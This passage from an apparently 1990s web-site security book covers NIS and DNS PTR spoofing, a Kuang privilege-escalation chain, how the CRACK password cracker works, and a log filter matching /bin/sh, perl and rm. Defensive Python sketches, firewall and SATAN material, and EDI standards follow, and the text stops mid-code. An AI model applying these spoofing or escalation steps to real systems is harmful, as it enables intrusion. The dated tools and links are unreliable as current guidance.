NIS clients and servers do not authenticate each other. Once crackers have guessed the domain name, they can put mail aliases on the server to do arbitrary things (like mail back the password file). Once crackers have penetrated a server, they can get the files that show which machines are trusted and attack any machine that trusts another.

Even if the system administrator has been careful to prune down /etc/hosts.equiv and has restricted the use of .rhosts, so that only a single other machine is trusted, the cracker can spoof the target into thinking the cracker's machine is the trusted one.

If a cracker controls the NIS master, he edits the host database to tell everyone that the cracker, too, is a trusted machine. Another trick is to write a replacement for ypserv. The ypbind daemon can be tricked into using this fake version instead of the real one.

Because the cracker controls the fake, the cracker can add his or her own information to the password file. More sophisticated attacks rely on sniffing the NIS packets off the Internet and providing a faked response.

Still another hole in NIS comes from the way /etc/passwd can be incorrectly configured. When a site is running NIS, it puts a plus sign in the /etc/passwd file to tell the system to consult NIS about passwords. Some system administrators erroneously put a plus sign in the /etc/passwd file that they export, effectively making a new user: '+'.

If the system administrator uses DNS instead of NIS, crackers must work a bit harder. Suppose crackers have discovered that victim.com trusts friend.net. They change the Domain Name System pointer record (the PTR record) on their network to claim that their machine is really friend.net. If the original record says

1.192.192.192.in-addr.arpa  IN  PTR  attacker.com

they change it to read

1.192.192.192.in-addr.arpa  IN  PTR  friend.net

If victim.com does not check the IP address but trusts the PTR record, victim.com now believes that commands from attacker.com are actually from the trusted friend.net, and the cracker is in.
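
The defense implied here is to check the claimed name in both directions: look up the PTR record, then look up the address of the name it returns and make sure the original address is among the results. The following Python sketch shows the idea. The function names are illustrative, and the two lookup functions are passed in as parameters so that the logic can be exercised without touching a live name server.

```python
import socket


def system_reverse(ip):
    """PTR lookup: IP address -> claimed host name."""
    return socket.gethostbyaddr(ip)[0]


def system_forward(name):
    """Forward lookup: host name -> list of IPv4 addresses."""
    return socket.gethostbyname_ex(name)[2]


def is_forward_confirmed(ip, reverse=system_reverse, forward=system_forward):
    """Trust the PTR name only if that name maps back to the same address."""
    try:
        claimed_name = reverse(ip)
        addresses = forward(claimed_name)
    except OSError:
        return False  # no PTR record, or the claimed name does not resolve
    return ip in addresses
```

In the example above, the attacker controls the PTR record for 192.192.192.1 but not the address records for friend.net, so the forward lookup returns friend.net's real addresses and the check fails.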

Additional Resources to Aid Site Security  The current network world has been likened to the wild West. Most people are law-abiding, but there are enough bad guys to keep everyone on their toes. There is no central authority that can keep the peace. Each community needs to take steps to protect itself.

The first section of this chapter, "Web Security on the Internet and Intranet," tells you what the individual "storekeeper" can do to keep a site secure. This section tells you what the system administrator can do. Many of the cracking techniques described here are obsolete but are representative of current attacks and vulnerabilities. Newer versions of UNIX have fixed those holes, but new vulnerabilities are being found every day. To stay current, use the resources listed in this section.

The following are some mailing lists that discuss site security:

For some good ideas on how to secure your site, from the people who chase crackers for a living, visit http://www.fbi.gov/compcrim.htm.

You should also visit http://www.cs.purdue.edu/homes/spaf/hotlists/csec-top.html, the comprehensive list of computer security links maintained by Gene Spafford, a leading researcher in this area.

To catch up on the latest security advisories, point your browser at DOE's Computer Incident Advisory Center, http://ciac.llnl.gov/ciac/documents/index.html. This site includes notices from UNIX vendors as well as reports from the field.

http://www.tezcat.com/web/security/security_top_level.html attempts to provide "one-stop shopping" for everything related to computer security. They do a creditable job and are worth a visit.

For an eye-opener about vulnerabilities in your favorite products, visit http://www.c2.org/hacknetscape/, http://www.c2.org/hackjava/, http://www.c2.org/hackecash/, and http://www.c2.org/hackmsoft/.

More general information is available from the Computer Operations and Security Technology (COAST) site at Purdue University: http://www.cs.purdue.edu/coast/coast.html. These are the folks who produce Tripwire.

Danny Smith of the University of Queensland in Australia has written several papers on the topics covered in this chapter. "Enhancing the Security of UNIX Systems" covers specific attacks and the coding practices that defeat them. "Operational Security - Occurrences and Defense" is a summary of the major points of his other papers. These and other papers on this topic are archived at ftp://ftp.auscert.org.au/pub/auscert/papers/.

Rob McMillan, also at the University of Queensland, wrote, "Site Security Policy." This paper can be used as the framework to write a Computer Security Policy for a specific organization. It is also archived at ftp://ftp.auscert.org.au/pub/auscert/papers/.

For a real-life account of pursuing a cracker in real time, see Cliff Stoll's The Cuckoo's Egg or Bill Cheswick's "An Evening with Berferd In Which A Cracker Is Lured, Endured, and Studied," available at ftp://ftp.research.au.com/dist/internet_security/berferd.ps.

Checklist for Site Security

Several good checklists that point out possible vulnerabilities are available on the Net or in the literature.

File Permissions on Server and Document Roots

Common advice on the Web warns Webmasters not to "run their server as root." This caution has led to some confusion. By convention, Web browsers look at TCP port 80, and only root can open port 80.

So user root must start httpd for the server to offer http on port 80. Once httpd is started, it forks several copies of itself that are used to satisfy client requests. These copies should not run as root. It is common instead to run them as the unprivileged user nobody.

One good practice is to set up a special user and group to own the Web site. Here is one such configuration:

drwxr-xr-x  5 www  www     1024 Feb 21 00:01 cgi-bin/
drwxr-x---  2 www  www     1024 Feb 21 00:01 conf/
-rwx------  1 www  www   109674 Feb 21 00:01 httpd
drwxrwxr-x  2 www  www     1024 Feb 21 00:01 htdocs/
drwxrwxr-x  2 www  www     1024 Feb 21 00:01 icons/
drwxr-x---  2 www  www     1024 Feb 21 00:01 logs/

In this example, the site is owned by user www of group www. The cgi-bin directory is world-readable and executable, but only the site administrator can add or modify CGI scripts. The configuration files are locked away from non-www users completely, as is the httpd binary. The document root and icons are world-readable. The logs are protected.
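
A layout like this is easy to get right once and hard to keep right. The following Python sketch walks a server root and reports anything that has drifted into a riskier state. It is an illustration only: the function names are hypothetical, and the two conditions it flags (world-writable, set-user-ID) are just a starting point for a site's own rules.

```python
import os
import stat


def permission_problems(path):
    """Return a list of warnings for one file or directory."""
    mode = os.stat(path).st_mode
    problems = []
    if mode & stat.S_IWOTH:
        problems.append("world-writable")
    if mode & stat.S_ISUID:
        problems.append("set-user-ID bit set")
    return problems


def audit_tree(root):
    """Walk a server root and map each offending path to its warnings."""
    report = {}
    for directory, _subdirs, files in os.walk(root):
        candidates = [directory] + [os.path.join(directory, f) for f in files]
        for path in candidates:
            if os.path.islink(path):
                continue  # symbolic links are a separate policy question
            problems = permission_problems(path)
            if problems:
                report[path] = problems
    return report


if __name__ == "__main__":
    # The path below is a placeholder; substitute your own server root.
    for path, problems in sorted(audit_tree("/usr/local/etc/httpd").items()):
        print(path, ", ".join(problems))
```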

On some sites, it is appropriate to grant write access to the cgi-bin directory to trusted authors or to grant read access to the logs to selected users. Such decisions are part of the trade-off between usability and security discussed in the section entitled "Simple Privacy."

Optional Server Features

Another such trade-off is in the area of optional server features. Automatic directory listings, symbolic link following, and server-side includes (especially exec) each afford visibility and control to a potential cracker. The site administrator must weigh the needs of security against user requests for flexibility.

Freezing the System: Tripwire

One common cracker trick is to infiltrate the system as a non-privileged user, change the path so that the cracker's version of some common command such as ls gets run by default, and then wait for a privileged user to run the substituted command. Such programs, Trojan horses, can be introduced to the site in many ways.

Here's one way to defend against this attack. Install a clean version of the operating system and associated utilities. Before opening the site to the network, run Tripwire, from ftp://coast.cs.purdue.edu/pub/COAST/Tripwire/. Tripwire calculates checksums for key system files and programs.

Print out a copy of the checksums and store them in a safe place. Save a copy to a disk, such as a floppy disk, that can be write-locked. After the site is connected to the Internet, schedule Tripwire to run from the crontab; it will report any changes to the files it watches.
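
The principle behind this procedure (record a baseline while the system is known to be clean, then compare against it later) fits in a few lines. The following Python sketch is not Tripwire and does not use Tripwire's file formats; the function names are illustrative, and the choice of SHA-256 as the checksum is an assumption made for the example.

```python
import hashlib
import os


def checksum(path, chunk_size=65536):
    """Return the SHA-256 digest of a file as a hex string."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(paths):
    """Record a baseline: {path: digest} for every file in paths."""
    return {path: checksum(path) for path in paths}


def changes(baseline):
    """Compare the files on disk with a stored baseline."""
    report = {}
    for path, old_digest in baseline.items():
        if not os.path.exists(path):
            report[path] = "missing"
        elif checksum(path) != old_digest:
            report[path] = "modified"
    return report
```

As with Tripwire itself, the comparison is only as trustworthy as the stored baseline, which is why the baseline belongs on write-locked media rather than on the server it describes.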

Another good check is to visually inspect the server's access and error logs. Scan for UNIX commands like rm, login, and /bin/sh. Look for anyone trying to invoke Perl. Watch for extremely long lines in URLs.

The earlier "The Morris Worm" section shows how a C or C++ program can have its buffer overflowed. Crackers know that a common buffer size is 1,024. They will attempt to send many times that number of characters to a POST script to crash it.
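
Visual inspection can be backed up by a simple filter. The following Python sketch flags access-log lines whose request is longer than the common buffer size or mentions one of the commands listed above. It assumes that each log line carries the request in double quotes; the pattern list and the function name are illustrative. Expect false positives (a page named login.html will match, for example), so treat the output as a list of lines to read, not a verdict.

```python
import re

# Assumption: each access-log line carries the request in double quotes,
# as in: host - - [date] "GET /path HTTP/1.0" 200 1234
REQUEST = re.compile(r'"(?P<request>[^"]*)"')
SUSPICIOUS = re.compile(r"/bin/sh|\bperl\b|\brm\b|\blogin\b", re.IGNORECASE)
MAX_REQUEST_LENGTH = 1024  # the common buffer size mentioned above


def reasons_to_worry(line):
    """Return a list of reasons why one log line deserves a closer look."""
    match = REQUEST.search(line)
    # Fall back to the whole line if no quoted request is found.
    request = match.group("request") if match else line
    reasons = []
    if len(request) > MAX_REQUEST_LENGTH:
        reasons.append("request longer than %d characters" % MAX_REQUEST_LENGTH)
    hit = SUSPICIOUS.search(request)
    if hit:
        reasons.append("mentions %s" % hit.group(0).lower())
    return reasons
```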

If your site uses access.conf or .htaccess for user authentication, look for repeated attempts to guess the password. Better still, put in your own authenticator, like the one described in the "Password-Protection Scripts" section, and limit the number of times a user can guess the password before the username is disabled.

Checking File Permissions Automatically

The Computer Oracle and Password System (COPS) is a set of programs that report file, directory, and device permissions problems. It also examines the password and group files, the UNIX startup files, anonymous FTP configuration, and many other potential security holes.

COPS includes the Kuang Rule-Based Security Checker, an expert system that tries to find links from the outside world to the superuser account. Kuang can find obscure links. For example, given the goal, "become superuser," Kuang may report a path like:

member workGrp,
write ~jones/.cshrc,
member staff,
write /etc,
replace /etc/passwd,
become root.

This sequence says that if an attacker can crack the account of a user who is a member of group workGrp, the cracker could write to the startup file used by user jones. The next time jones logs in, those commands are run with the privileges of jones.

jones is a member of the group staff, whose members can write to the /etc directory. The commands added to jones's startup file could replace /etc/passwd with a copy, giving the attacker a privileged account. On a UNIX system with more than a few users, COPS is likely to find paths that allow an attack to succeed. COPS is available at ftp://archive.cis.ohio-state.edu/pub/cops/1.04+.
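
The reasoning in a report like this is a path search: each step is a privilege, and each link says that whoever holds one privilege can obtain the next. The following Python sketch runs a breadth-first search over a hand-built graph modeled on the report above. It is not a reimplementation of Kuang; the graph, the function name, and the search strategy are all assumptions made for the illustration.

```python
from collections import deque

# Hypothetical privilege graph modeled on the Kuang report above: an edge
# "a -> b" means "anyone who holds a can obtain b".
EXAMPLE_GRAPH = {
    "member workGrp": ["write ~jones/.cshrc"],
    "write ~jones/.cshrc": ["member staff"],
    "member staff": ["write /etc"],
    "write /etc": ["replace /etc/passwd"],
    "replace /etc/passwd": ["become root"],
}


def attack_path(graph, start, goal="become root"):
    """Breadth-first search for the shortest chain from start to goal."""
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        if path[-1] == goal:
            return path
        for step in graph.get(path[-1], []):
            if step not in seen:
                seen.add(step)
                queue.append(path + [step])
    return None  # no chain of privileges leads to the goal


if __name__ == "__main__":
    print(",\n".join(attack_path(EXAMPLE_GRAPH, "member workGrp")) + ".")
```

Removing any one edge (for example, taking away group write access to /etc) breaks the chain, which is how a report like this is meant to be used.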

CRACK

CRACK is a powerful password cracker. It is the sort of program that attackers use if they can get a copy of a site's password file. Given a set of dictionaries and a password file, CRACK can often find 25 to 50% of the passwords on a site in just a few hours.

CRACK uses the gecos information in the password file, words from the dictionary, and common passwords like qwerty and drowssap (password spelled backwards). CRACK can spread its load out over a network, so it can work on large sites by using the power of the network itself.
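
The same guessing strategy can be turned around and used defensively, to reject a weak password at the moment a user proposes it. The following Python sketch builds the most obvious guesses for one account from the username and gecos field. It is not CRACK's algorithm; the function names and the three-word sample list are assumptions made for the illustration, and a real checker would use a full dictionary.

```python
COMMON_PASSWORDS = {"password", "qwerty", "drowssap"}  # tiny sample list


def candidate_guesses(username, gecos):
    """Build the guesses a cracker would try first for one account."""
    words = {username.lower()}
    # The gecos field usually starts with the full name; take only that part.
    full_name = gecos.split(",")[0]
    words.update(part.lower() for part in full_name.split())
    guesses = set(COMMON_PASSWORDS)
    for word in words:
        guesses.add(word)
        guesses.add(word[::-1])  # spelled backwards, like "drowssap"
    return guesses


def is_weak(password, username, gecos):
    """True if a proposed password is one of the obvious guesses."""
    return password.lower() in candidate_guesses(username, gecos)
```

For the account mikem with the gecos entry "Mike Morgan,x7733", this check rejects mike, morgan, nagrom, and qwerty, among others.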

CRACK is available at ftp://ftp.uu.net/usenet/comp.sources.misc/volume28.

TAMU Tiger

Texas A&M University distributes a program similar to a combination of COPS and Tripwire. It scans a UNIX system as COPS does, looking for holes. It also checksums system binaries like Tripwire. For extra security, consider using all three: Tiger, COPS, and Tripwire.

Source for various tools in the TAMU security project is archived at ftp://net.tamu.edu/pub/security/TAMU.

xinetd

UNIX comes with a daemon called inetd, which is responsible for managing the TCP "front door" of the machine. Clearly, inetd could play a role in securing a site, but the conventional version of inetd has no provision for user authentication. A service such as telnet or FTP is either on or off.

To fill this need, Panagiotis Tsirigotis (panos@cs.colorado.edu) developed the "extended inetd" or xinetd. The latest source file is available at ftp://mystique.cs.colorado.edu. The file is named xinetd-2.1.4.tar and contains a Readme file showing the latest information.

Configuring xinetd  Once xinetd has been downloaded and installed, each service is configured with an entry in the xinetd.conf file. The entries have the form

service <service_name>
{
    <attribute> <assign_op> <value> <value> ...
}

Valid attributes include

The access control directives are

only_from and no_access take hostnames, IP addresses, and wildcards as values. access_times takes, of course, time ranges. disabled turns the service off completely and disables logging of access attempts.

TIP
Do not use disabled to turn off a service. Instead, use no_access 0.0.0.0. In this way, attempts to access the service are logged, giving early warning of a possible attack.

Detecting Break-In Attempts  As this chapter shows, cracking a system is an inexact art. The cracker probes areas of likely vulnerability. When one of the probes succeeds (and the determined cracker almost always gets in eventually), the first order of business is cleaning up the evidence of the break-in attempts.

By logging unsuccessful attempts and examining the logs frequently, the system administrator can catch some of these break-in attempts and alert the IRT.

After watching the xinetd log for a while, system administrators begin to notice patterns of use and can design filters and tools to alert them when the log's behavior deviates from the pattern.

For example, a simple filter to detect failed attempts can be built in one line:

grep "FAIL" /var/log/xinetd.log

Each failure line gives the time, the service, and the address from which the attempt was made. A typical pattern for a site with a public httpd server might be infrequent failures of httpd because it would usually not have any access restrictions and somewhat more frequent failures of other services.

For example, if the system administrator has restricted telnet to the time period of 7 am to 7 pm, there will be a certain number of failed attempts in the mid-evening and occasionally late at night.

Suppose the system administrator determines that any attempt to telnet from outside the 199.199.0.0 world is unusual, and more than one failed telnet attempt between midnight and 7 am is unusual. A simple Perl script would split the time field and examine the values, and could also count the number of incidents (or pipe the result out to wc -l).

Another good check is to have the script note the time gap between entries. A maximum allowable gap is site-specific and varies as the day goes on. Large gaps are evidence that some entries may have been erased from the log and should serve as warnings.
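
The checks just described can be sketched as follows, here in Python rather than Perl. The log line layout shown in the comment is an assumption, not taken from the xinetd documentation, so adjust the pattern to match your own log. The /16 network mask, the two-hour maximum gap, and the function names are likewise placeholders.

```python
import ipaddress
import re
from datetime import datetime, timedelta

# Assumed line layout (adjust to your own log):
#   96/3/20@02:13:45: FAIL: telnet address from=199.198.197.1
LINE = re.compile(r"^(?P<stamp>\S+): (?P<status>[A-Z]+): (?P<service>\S+)"
                  r".*\bfrom=(?P<address>\S+)")
LOCAL_NET = ipaddress.ip_network("199.199.0.0/16")  # assumed mask
NIGHT_START, NIGHT_END = 0, 7    # midnight to 7 am
MAX_NIGHT_FAILURES = 1
MAX_GAP = timedelta(hours=2)     # site-specific; pick your own value


def parse(line):
    """Return (time, status, service, address), or None if unparseable."""
    match = LINE.match(line)
    if match is None:
        return None
    try:
        when = datetime.strptime(match.group("stamp"), "%y/%m/%d@%H:%M:%S")
        address = ipaddress.ip_address(match.group("address"))
    except ValueError:
        return None
    return when, match.group("status"), match.group("service"), address


def log_alerts(lines):
    """Apply the telnet and time-gap rules to a sequence of log lines."""
    alerts = []
    night_failures = 0
    previous = None
    for line in lines:
        entry = parse(line)
        if entry is None:
            continue
        when, status, service, address = entry
        # A long silence may mean that entries were erased.
        if previous is not None and when - previous > MAX_GAP:
            alerts.append("gap in log before %s" % when)
        previous = when
        if service != "telnet":
            continue
        if address not in LOCAL_NET:
            alerts.append("outside telnet attempt from %s" % address)
        if status == "FAIL" and NIGHT_START <= when.hour < NIGHT_END:
            night_failures += 1
    if night_failures > MAX_NIGHT_FAILURES:
        alerts.append("%d failed telnet attempts overnight" % night_failures)
    return alerts
```

This version counts overnight failures across all the lines it is given, so it is best run on one day's entries at a time.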

Such a script could be put into the crontab, but an attacker is likely to check for security programs there. If the system supports personal crontabs, consider putting this script in the crontab of a random user.

Otherwise, have it reschedule itself using the UNIX batch utility, called at, or conceal it with an innocuous-sounding name. These techniques make it less likely for a successful cracker to discover the log filter and disable the warning.

Anytime the log shows evidence that these warning limits have been violated, the script can send e-mail to the system administrator. The administrator will also want to visually check the log from time to time to make sure the patterns haven't changed.

Catching the Wily Cracker

Sooner or later, it's bound to happen. The xinetd logs show a relentless attack on telnet or ftpd or fingerd. Or worse still, they don't show the attack, but there's an unexplained gap in the log. The site has been penetrated. Now is the time to call your computer security Incident Response Team (IRT) if your organization has one. Depending on what the attacker has done, a call to the appropriate law enforcement agency may also be in order.

TIP
If your organization doesn't have an IRT, don't wait until an attack to form one. Check out Danny Smith's excellent paper, "Forming an Incident Response Team," available at ftp://ftp.auscert.org.au/pub/auscert/papers/.

To start the investigation, look at the log entries to determine where the attack came from. The log will show an IP address. As this chapter shows, such information can be forged, but knowing the supposed IP is at least a starting point.

To check out an IP address, start with the InterNIC, the clearinghouse for domain names operated by the U.S. government. Use telnet to connect to rs.internic.net. At the prompt, enter whois and the first three octets from the log. For example, if the log says the attack came from 199.198.197.1, enter

whois 199.198.197

This query should return a record showing who is assigned to that address. If nothing useful is revealed, examine higher-level addresses, such as

whois 199.198

Eventually the search should reveal an organization's name. Now at the whois: prompt, enter that name. The record that whois returns will list the names of one or more coordinators. One of those coordinators should be contacted (preferably by the IRT) so that the organization can begin checking on its end.

NOTE
Remember that the IP address may be forged, and the organization (and its staff) may be completely innocent. Be careful about revealing any information about the investigation outside official channels, both to avoid tipping the intruder and to avoid slandering an innocent organization.
Remember, too, that any information sent by e-mail can be intercepted by the cracker. The cracker is likely to monitor e-mail from root or from members of the security group. Even if mail is encrypted, the recipient can be read and a cracker can be tipped off by seeing e-mail going to the IRT. Use the phone or the fax for initial contacts to the IRT, or exchange e-mail on a system that is not under attack.

Work with the IRT and law enforcement agencies to determine when to block the cracker's attempts. Once crackers are blocked, they may simply move to another target or attack again, being more careful to cover their tracks. Security personnel may want to allow the attacks to continue for a time while they track the cracker and make an arrest.

Firewalls

Much has been said in the news media about the use of firewalls to protect an Internet site. Firewalls have their place and, for the most part, they do what they set out to do. Bear in mind that many of the attacks described in this chapter will fly right through a firewall.

Installing a firewall is the last thing to do for site security, in the literal sense. Follow the recommendations given here for making the site secure so that a cracker has to work hard to penetrate security. Then, if further security is desired, install a firewall.

Using this strategy, the system administrator does not get a false sense of security from the firewall. The system is already resistant to attack before the firewall is installed. Attackers who get through the firewall still have their work cut out for them.

Because most systems will continue to have negligible security for the foreseeable future, one can hope that the cracker who gets through the firewall, only to face your seemingly impregnable server, will get discouraged and go prey on one of the less-protected systems.

A firewall computer sits between the Internet and a site, screening or filtering IP packets. It is the physical embodiment of much of a site's security policy. For example, the position taken in the tradeoff between usability and security is called a site's "stance."

A firewall can be restrictive, needing explicit permission before it authorizes a service, or permissive, permitting anything that has not been disallowed. In this way, configuring firewall software is akin to configuring xinetd.
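
The difference between the two stances comes down to what happens to a service that nobody has mentioned. The following Python sketch makes the rule explicit. The function name and the rule lists are hypothetical; real firewall software expresses the same decision in its own configuration syntax.

```python
def is_allowed(service, stance, allowed=(), denied=()):
    """Decide whether a service passes, given the site's stance.

    restrictive: only services explicitly allowed get through.
    permissive:  everything gets through unless explicitly denied.
    """
    if stance == "restrictive":
        return service in allowed
    if stance == "permissive":
        return service not in denied
    raise ValueError("unknown stance: %r" % stance)
```

Under a restrictive stance with only http allowed, an unlisted service such as tftp is refused. Under a permissive stance with only telnet denied, the same tftp request passes.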

Several designs are available for firewalls. Two popular topologies are the Dual-Homed Gateway and the Screened Host Gateway, illustrated in Figures 23.2 and 23.3, respectively.

Figure 23.2 : A Dual-Homed Gateway sits between the Internet and the local network.

Figure 23.3 : A Screened Host Gateway watches incoming packets and passes only authorized requests on to the local network.


The Web server can be run on the bastion host in either topology or inside the firewall with the screened host topology. Other locations are possible but need more complex configuration and sometimes additional software.

Marcus Ranum provides a full description of these and other topologies in his paper, "Thinking About Firewalls," available at ftp://ftp.tis.com/pub/firewalls/firewalls.ps.Z.

Both commercial and free software is available to implement the firewall function. The Firewall Toolkit, available at ftp://ftp.tis.com/pub/firewalls/toolkit/fwtk.tar.Z, is representative.

Security Administrator's Tool for Analyzing Networks

The classic paper on cracking is "Improving the Security of Your Site by Breaking into It," available online at ftp://ftp.win.tue.nl/pub/security/admin-guide-to-cracking.101.Z.

Dan Farmer and Wietse Venema describe many attacks (some now obsolete). They also propose a tool to automatically check for certain security holes. The tool was ultimately released under the name Security Administrator's Tool for Analyzing Networks (SATAN).

SATAN is an extensible tool. Any executable put into the main directory with the extension .sat is executed when SATAN runs. Information on SATAN is available at http://www.fish.com/satan/.

SATAN's Good Behavior

Once SATAN is installed and started, it "explores the neighborhood" with DNS and a fast version of ping to build a set of targets. It then runs each test program over each target.

When all test passes are complete, SATAN's data filtering and interpreting module analyzes the output, and a reporting program formats the data for use by the system administrator.

ON THE WEB
http://www.netsurf.com/nsf/latest.focus.html  This site contains many links to security-related sites. Also, you can read articles about specific security topics, such as JavaScript security holes.

Making Sure You Have a Legitimate Version of SATAN

For some functions, SATAN must run with root privilege. One way an infiltrator might break into a system is to distribute a program that masquerades as SATAN or add .sat tests that actually widen security holes.

To be sure you have a legitimate version of SATAN, check the MD5 message digest fingerprint. The latest fingerprints for each component are available at http://www.cs.ruu.nl/cert-uu/satan.html.
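
Checking a fingerprint means computing the MD5 digest of the file you downloaded and comparing it, character for character, with the published value. The following Python sketch shows one way to do that. The function names are illustrative, and the published fingerprint must come from a source you trust, obtained separately from the download itself.

```python
import hashlib


def md5_fingerprint(path, chunk_size=65536):
    """Return the MD5 digest of a file as a lowercase hex string."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_published(path, published):
    """Compare a file's MD5 with a fingerprint copied from a trusted source."""
    # Published fingerprints are often grouped with spaces or in upper case.
    expected = published.replace(" ", "").lower()
    return md5_fingerprint(path) == expected
```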

Electronic Data Interchange via the Internet

As businesses become more sophisticated, they have begun moving toward Electronic Commerce. Electronic Commerce includes the specialized area of Electronic Data Interchange (EDI). True EDI adheres to rigorous standards and often is delivered over special networks.

A site owner can send e-mail to a wholesaler ordering merchandise at any time, but that doesn't make the exchange EDI. EDI is characterized by four factors:

The third factor might seem a bit odd. For many purchases, there's little need for a sales representative to contact a buyer personally. For commodity items, such personal contact prior to the sale represents an added expense for the seller that must be passed on to the buyer. The value added by such salespeople has traditionally been to make the buyer aware of their company as a supplier.

True EDI is conducted mostly over specialized value-added networks (VANs). These VANs serve to "introduce" trading partners who have no prior business relationship. Although each VAN is different, here's how EDI generally works:

  1. Sellers register their businesses on one of the VANs, using standardized codes to identify what goods or services they sell.
  2. Buyers post Requests for Quotations (RFQs) to the VANs in a standardized format.
  3. The VAN delivers RFQs to the appropriate sellers by e-mail.
  4. A seller analyzes each RFQ and prepares a bid, which is posted on the VAN.
  5. The VAN delivers the bid back to the buyer.

If the seller wins the bid, the buyer sends a purchase order (PO) message back through the VAN. A contract award message is posted, and in many cases (for example, if the buyer is the U.S. government), the winning price is announced.

There are two major sets of standards used in EDI. The international standard, promulgated by the United Nations, is called EDIFACT. The U.S. standard is called X12. The ISO adopted EDIFACT in 1987 as its standard. The U.N. and ANSI have announced that, as of 1997, EDIFACT and X12 will be merged.

NOTE
The alignment plan was adopted by a mail ballot of X12 in December 1994-January 1995. That plan is available online at http://polaris.disa.org/edi/ALIGNMEN/ALINPLAN.htp. The text of the floor motion adopted at the February 1995 X12 meeting is at http://polaris.disa.org/edi/ALIGNMEN/ALINMOTN.htp.
Note that the Data Interchange Standards Association (DISA) is in the process of reorganizing their server. If you cannot find the information at the above URLs, go to http://www.disa.org/ and follow the links to the search page. There, search for references to "alignment," and you'll get the latest URLs.

Much of the impetus behind EDI has come from the U.S. government. On October 26, 1993, President Clinton signed an executive memorandum requiring federal agencies to implement the use of electronic commerce in federal purchases as quickly as possible. The order specified that by the end of FY 1997, most U.S. federal purchases under $100,000 must be made by EDI.

The President's order formed the Federal Electronic Commerce Acquisition Team (ECAT) that generated the guidelines for the Federal EDI initiative. ECAT has since been reorganized into the Federal Electronic Commerce Acquisition Program Office (ECA-PMO); its documents (and those of ECAT) are available on the Internet at ftp://ds.internic.net/pub/ecat.library/. The ECA-PMO also operates a Web site at http://snad.ncsl.nist.gov:80/dartg/edi/fededi.html courtesy of the National Institute of Standards and Technology (NIST).

The federal implementation guidelines for purchase orders (in ftp://ds.internic.net/pub/ecat.library/fed.ic/ascii/part-22.txt) provide over 100 pages of details on how the U.S. government interprets X12 transaction set 850 (described later in more detail in the "ASC X12" section).

RFC 1865, dated January 1996 and titled "EDI Meets the Internet," was written by a small team led by Walter Houser of the U.S. Department of Veterans Affairs and reflects part of the federal focus and enthusiasm for EDI. Although much of EDI is conducted through VANs, RFC 1865 points out that the EDI standards allow almost any means of transfer and that the Internet is well-suited for most EDI functions. The RFC quotes the ECAT as saying, "The Internet network may be used for EDI transactions when it is capable of providing the essential reliability, security, and privacy needed for business transactions." You can read this RFC from the files on the CD-ROMs that accompany this book.

Although the largest portion of federal EDI is conducted over the VANs, RFC 1865 makes a strong case that tools are available on the Internet today to provide this essential reliability, security, and privacy.

NOTE
For more information on the Federal EDI initiative, join the FED-REG mailing list. To subscribe, send a message to fed-reg-request@snad.ncsl.nist.gov. The message body should contain only the following line:
subscribe fed-reg
ECAT also operates a mailing list, appropriately named ecat. To subscribe, send a message to listserv@forums.fed.gov containing only the following line:
subscribe ecat firstname lastname

NOTE
For more general information on EDI, subscribe to the EDI-L mailing list. Send a message to listserv@uccvma.ucop.edu containing only the following line:
subscribe edi-l yourname
This mailing list is also transferred via gateway to the UseNet newsgroup bit.listserv.edi-l.
New methods of EDI, including EDI over the Internet, are discussed on the EDI-NEW mailing list. Send a message to edi-new-request@tegsun.harvard.edu containing only the following line:
subscribe edi-new yourname


ON THE WEB
ftp://ftp.sterling.com/edi/lists/  To come up to speed quickly on EDI, review archives of the many EDI-related mailing lists stored at this site.

EDI Standards

The key to making EDI work on a large scale is the rigorous use of standards. In recent years, two groups of standards have emerged: an international standard promulgated by the United Nations, and a U.S. standard designed by ANSI. More recently, both organizations have agreed to build a unified standard, which will allow EDI to become truly worldwide. This section describes the two major standards sets and their proposed unification.

UN/EDIFACT  The United Nations promulgates a set of rules "for Electronic Data Interchange for Administration, Commerce and Transport" (UN/EDIFACT). The full standards are available online at http://www.premenos.com/. Each document type (known in EDI circles as a transaction set) is quite robust. For example, a purchase order can specify multiple items or services, each with more than one delivery schedule, along with full details for transport and destination as well as delivery patterns.
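
To make the shape of such a transaction set concrete, here is a minimal Python sketch of a purchase order that carries several items, each with its own delivery schedules. The class and field names are illustrative assumptions only; they are not UN/EDIFACT segment or element names, and the real standard defines far more detail.

```python
from dataclasses import dataclass, field
from decimal import Decimal
from typing import List


@dataclass
class DeliverySchedule:
    """One delivery of part of an item (hypothetical fields)."""
    date: str          # ISO date string, for example "1996-07-01"
    quantity: int
    destination: str
    transport: str


@dataclass
class LineItem:
    """One item or service on the order, with one or more deliveries."""
    description: str
    unit_price: Decimal
    schedules: List[DeliverySchedule] = field(default_factory=list)

    def total_quantity(self) -> int:
        return sum(s.quantity for s in self.schedules)


@dataclass
class PurchaseOrder:
    """A purchase order covering multiple items (illustrative only)."""
    order_number: str
    buyer: str
    seller: str
    items: List[LineItem] = field(default_factory=list)

    def total_cost(self) -> Decimal:
        return sum(
            (item.unit_price * item.total_quantity() for item in self.items),
            Decimal("0"),
        )


order = PurchaseOrder(
    order_number="PO-0001",
    buyer="mickey.example",
    seller="donald.example",
    items=[
        LineItem("Widgets", Decimal("2.50"), [
            DeliverySchedule("1996-07-01", 100, "Warehouse A", "truck"),
            DeliverySchedule("1996-08-01", 50, "Warehouse B", "rail"),
        ]),
        LineItem("Consulting hours", Decimal("100.00"), [
            DeliverySchedule("1996-07-15", 8, "Head office", "on site"),
        ]),
    ],
)
print(order.total_cost())
```

An EDI mapping package does the equivalent translation between a structure like this in your in-house system and the standard's own segment layout.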

The full UN/EDIFACT standard is available online via gopher at gopher://infi.itu.ch. Go to Entry 11 (U.N. and international organizations). Choose Entry 1 (U.N. EDITRANS, U.S./EDIFACT), then Entry 3 (UN-EDIFACT standards database), then Entry 1 (Publications). The actual standards are at Option 1, "Drafts." Draft D93A becomes standard S94A, D94A becomes the following year's standard, and so on.

As an alternative to gopher, you can get the standards by e-mail. Send a message to itudoc@itu.ch containing the following body:

START
GET ITU-1900
END
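
If you would rather script the request than type it, the following is a minimal sketch that builds the same message with Python's standard email package. The sender address is a placeholder, and the helper name build_command_message is hypothetical; only the recipient and the three body lines come from the text above.

```python
from email.message import EmailMessage
from typing import Sequence


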